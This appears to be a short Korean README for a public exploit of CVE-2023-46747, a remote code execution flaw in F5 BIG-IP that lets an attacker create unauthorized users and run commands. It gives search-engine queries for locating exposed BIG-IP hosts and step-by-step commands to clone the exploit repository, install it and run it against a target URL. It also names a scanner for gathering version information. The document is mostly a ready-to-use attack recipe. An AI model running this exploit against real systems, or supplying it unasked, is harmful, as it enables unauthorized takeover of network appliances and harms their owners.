
CVE-2023-46747용 익스플로잇, F5 BIG-IP의 원격 코드 실행 취약점으로 무단 사용자 생성 및 명령 실행을 허용합니다.
(title="BIG-IP®" || icon_hash="-335242539")
title:"BIG-IP®"
https://my.f5.com/manage/s/article/K000137353
현재 여기서 사용자는 admin만 있습니다:

스크립트 실행:
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890
명령이 성공적으로 실행되었습니다:


일부 버전에서 익스플로잇이 실패합니다. 참고: https://twitter.com/joel_land/status/1729147886615818732.
이 스크립트 https://github.com/BishopFox/bigip-scanner를 사용하여 F5 BIG-IP 버전 정보를 수집할 수 있습니다. 훌륭합니다!